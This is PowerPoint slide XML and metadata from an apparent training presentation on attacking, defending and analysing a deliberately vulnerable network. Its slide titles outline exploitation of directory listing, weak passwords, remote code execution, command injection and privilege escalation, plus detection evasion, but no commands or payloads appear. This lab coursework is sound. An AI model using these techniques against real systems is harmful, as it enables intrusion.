        <p:nvPicPr>
          <p:cNvPr id="2386" name="Google Shape;2386;p8" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703374" y="9260145"/>
            <a:ext cx="8663920" cy="1448076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2387" name="Google Shape;2387;p8" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9595967" y="9270121"/>
            <a:ext cx="14587508" cy="31185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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452"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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2393" name="Google Shape;2393;p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9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394" name="Google Shape;2394;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2396642"/>
            <a:ext cx="22942801" cy="98667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And it also identified usernames on the website:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2395" name="Google Shape;2395;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044800" y="3748615"/>
            <a:ext cx="18259948" cy="45343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1268</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>222</Paragraphs>
  <Slides>27</Slides>
  <Notes>27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27</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="40" baseType="lpstr">
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Final Engagement Attack, Defense &amp; Analysis of a Vulnerable Network</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Exploits Used: Target 1 </vt:lpstr>
      <vt:lpstr>Exploitation: Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exploitation: Weak Password Requirements</vt:lpstr>
      <vt:lpstr>Exploitation: Improper Access Control</vt:lpstr>
      <vt:lpstr>Improper Access Control</vt:lpstr>
      <vt:lpstr>Exploitation: Improper Privilege Management</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Exploits Used: Target 2 </vt:lpstr>
      <vt:lpstr>Exploitation: Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Exploitation: Remote Code Execution</vt:lpstr>
      <vt:lpstr>Exploitation: Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Stealth Exploitation: Exposure of Information through Directory Listing</vt:lpstr>
      <vt:lpstr>Stealth Exploitation: Remote Code Execution</vt:lpstr>
      <vt:lpstr>Stealth Exploitation: Command Injection</vt:lpstr>
      <vt:lpstr>SQL Database Exploitation: Improper Access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dc:title>
  <cp:lastModifiedBy>Jason Settlecowski</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-01T17:41:06Z</dcterms:modified>
</cp:coreProperties>
</file>